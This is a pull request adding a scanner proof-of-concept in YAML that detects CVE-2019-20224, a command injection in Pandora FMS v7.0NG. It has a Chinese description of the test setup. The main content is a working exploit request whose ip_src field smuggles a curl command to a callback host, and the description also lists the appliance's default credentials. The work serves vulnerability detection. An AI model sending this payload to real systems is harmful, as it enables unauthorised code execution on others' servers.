### PR TITLE
Create pandorafms-cve-2019-20224-rce.yml

### DIFF
--- a/pocs/pandorafms-cve-2019-20224-rce.yml
+++ b/pocs/pandorafms-cve-2019-20224-rce.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-pandorafms-cve-2019-20224-rce
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: >-
+      /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{reverseURL}}+%23&draw_button=Draw
+    follow_redirects: true
+    expression: |
+      response.status == 200 && reverse.wait(5)
+detail:
+  author: JingLing(https://hackfun.org/)
+  metinfo_version: Pandora FMS v7.0NG
+  links:
+    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/

--- a/pocs/pandorafms-cve-2019-20224-rce.yml
+++ b/pocs/pandorafms-cve-2019-20224-rce.yml
@@ -15,6 +15,6 @@ rules:
       response.status == 200 && reverse.wait(5)
 detail:
   author: JingLing(https://hackfun.org/)
-  metinfo_version: Pandora FMS v7.0NG
+  version: Pandora FMS v7.0NG
   links:
     - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
检测PandoraFMS v7.0NG管理后台远程代码执行漏洞(CVE-2019-20224)
## 测试环境
https://nchc.dl.sourceforge.net/project/pandora/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip
## 备注
下载ovf文件，使用VMware打开导入虚拟机并运行虚拟机，浏览器访问虚拟机IP地址便可访问pandorafms。
虚拟机默认账号和密码：root/pandora
Pandora FMS后台默认账号和密码：admin/pandora

测试时需要在config.yaml中填写cookie和反连平台信息，类似如下：
```yaml
cookies: # 每个请求预置的 cookie 值，效果上相当于添加了一个 Header: Cookie: key=value
    PHPSESSID: g5cq7h2r9usk1vc4ssflghiqt6
```
漏洞分析文章：https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
本地测试成功截图：
![image](https://user-images.githubusercontent.com/24275308/72219403-b2cbad00-3580-11ea-80a0-78de24a86c71.png)
